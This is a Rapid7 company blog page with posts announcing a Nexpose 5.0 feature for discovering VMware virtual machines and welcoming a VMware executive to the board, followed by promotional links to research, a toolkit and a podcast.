This is my first blog as a Rapid7 employee.  I started in July of this year as a product manager, and my first project is helping a team build a new discovery method for Nexpose.  Virtualization has been around since the 1960s, even…

This is my first blog as a Rapid7 employee.  I started in July of this year as a product manager, and my first project is helping a team build a new discovery method for Nexpose.  Virtualization has been around since the 1960s, even though it didn't start to become mainstream until the late 1990s when VMware was founded.  In the most recent years server virtualization has been growing at a rapid pace.  As it continues to spread, it introduces gaps in your security program.Over the last couple of months, I have talked with many Security Administrators and Infrastructure teams about their challenges with virtualization. I was truly enlightened by the issues and concerns they are having, not only because we can immediately resolve some with our upcoming Nexpose 5.0 release, but also because common themes kept coming up.The biggest common theme was no visibility into their virtual environments.  This introduces a security gap because virtual environments are very dynamic with virtual machines (VMs) being added, powered on/off, or changing hosts all the time.  It's hard to truly mitigate all of the risks if you don't know what you have out there.I'm really excited to say that in Nexpose 5.0 you can now leverage the new vAsset discovery method to discover VMs on VMware vCenter or ESX hosts.  This allows you to easily discover all your VMs that are both online and offline quickly, without needing to perform a network-based discovery scan.  Then, to narrow your results, you can filter your VMs by VM metadata that is retrieved from the VMware connection.  After you have performed a vAsset discovery you can easily create a dynamic site that is always kept up to date when changes occur in your virtual environment.  Nexpose is notified in real time when these changes are happening.  This ensures your site is updated appropriately and your assets are not being missed for vulnerability or compliance scanning.Future versions of Nexpose will continue to address additional virtualization security gaps, please leave me a comment with any ideas brewing that you'd like to see.

The Next Security Frontier: Virtualization

Most pundits agree that virtualization is taking the industry by storm. Leading analyst group IDC is projecting that more than 70% of all server workloads installed on new shipments are expected to reside in a virtual machine by 2014. With organizations lining up left and…

Most pundits agree that virtualization is taking the industry by storm. Leading analyst group IDC is projecting that more than 70% of all server workloads installed on new shipments are expected to reside in a virtual machine by 2014. With organizations lining up left and right to climb on the virtualization bandwagon, the security aspect of deploying virtualized software is a lot more nebulous. While virtualized deployments provide significant cost saving potential, assets moving around in virtualized servers are a lot harder to stay on top of than those deployed in traditional physical server environments. Additionally, a breach in the virtualization layer can easily lead to a compromise of all hosted applications and data. At the same time, vendors have been following a similar steep learning curve in bringing their products up to speed with the latest technology evolution in virtualization.Our vision at Rapid7 has always been that in order to provide a holistic view of an organization's security and risk posture, we need to correlate the various threat vectors that could lead to an attack. We broke new ground as the first vendor to offer a unified vulnerability management solution, NeXpose that correlated vulnerabilities across the network, operating system, database and application tiers. We continued our product innovation when we acquired the world's de facto standard for penetration testing platform, the Metasploit Project, and added the notion of exploitability directly into NeXpose. Virtualization is a natural evolution of our thinking. Maybe that is why the world's leading provider of virtualized solutions is both a client and a partner today. With support for authenticated and remote vulnerability scans for VMware ESX and ESXi already in place in NeXpose, we are looking at how we can further help organizations to continuously lower their risk posture in both physical and virtual environments.That's why we are so excited to have Christopher Young, VMware vice president and general manager and former RSA executive, join Rapid7's board of directors. With his significant security expertise, industry leadership and vision around virtualization, Christopher bringsunique insight into industry-shaping trends to Rapid7. We look forward to having Christopher further help to define the exciting journey on which we're embarking for virtualization security and security management in general. Welcome Christopher!Christopher Young,Rapid7 Board Member,VMware Vice PresidentandGeneral Manager

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Toolkit

Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now